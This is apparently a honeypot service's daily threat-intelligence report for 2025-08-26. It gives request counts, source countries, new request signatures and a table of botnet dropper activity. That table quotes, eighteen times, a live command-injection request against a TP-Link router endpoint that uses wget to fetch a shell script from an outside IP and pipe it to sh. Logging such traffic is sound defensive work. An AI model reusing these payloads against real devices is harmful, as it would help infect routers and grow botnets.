Daily Report: 2025-08-26#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 18 stage 1 IP address(es), linked to 3 dropper URL(s).
There are 7 new requests that have never been observed before (these were added to the monitored request database.).
A total of 396 requests were recorded during the day, originating from 18 different countries, with a peak of 114 requests coming from US.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
US | Germany |
US | Germany |
BR | Germany |
SG | Germany |
US | Germany |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
139.216.137.182 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
124.150.80.6 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
156.244.27.246 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
93.173.182.98 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
59.17.94.186 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
193.82.251.80 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
159.192.124.128 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//95.103.172.144/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
109.207.235.60 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
221.157.252.246 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//95.103.172.144/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
186.208.103.32 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//95.103.172.144/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
121.167.125.180 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
74.101.55.137 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
103.4.235.86 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
122.199.74.31 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
91.169.235.135 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
59.1.211.226 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
160.39.24.114 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
91.174.184.167 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
37 | 1 | GET /OdinHttpCall1756191837 HTTP/1.1 |
70 | 1 | GET /Odin/http/call1756191837 HTTP/1.1 |
71 | 1 | GET /odinhttpcall1756191837 HTTP/1.1 |
115 | 1 | CONNECT 196.251.80.241:80 HTTP/1.0 |
116 | 1 | \x04\x01\x00P\xC4\xFBP\xF1\x00 |
127 | 1 | \x00\x0E8\xDF\xB9Cra\x99\x1B\x8B\x00\x00\x00\x00\x00 |
135 | 1 | \x00\x0E8\xEC\x06\xAD\x88\xE8\x0F\x92\xBA\x00\x00\x00\x00\x00 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 114 | US |
1 | 64 | GB |
2 | 53 | DE |
3 | 47 | HK |
4 | 21 | SC |
5 | 13 | BG |
6 | 11 | KR |
7 | 11 | CN |
8 | 6 | AU |
9 | 6 | HU |
10 | 5 | NL |
11 | 5 | FR |
12 | 5 | CA |
13 | 4 | BR |
14 | 4 | ZA |
15 | 3 | JP |
16 | 3 | TH |
17 | 3 | SG |
18 | 2 | IN |
19 | 2 | PL |
20 | 2 | ES |
21 | 2 | RO |
22 | 2 | IL |
23 | 2 | RU |
24 | 1 | AR |
25 | 1 | BE |
26 | 1 | BD |
27 | 1 | MC |
28 | 1 | CO |
29 | 1 | IR |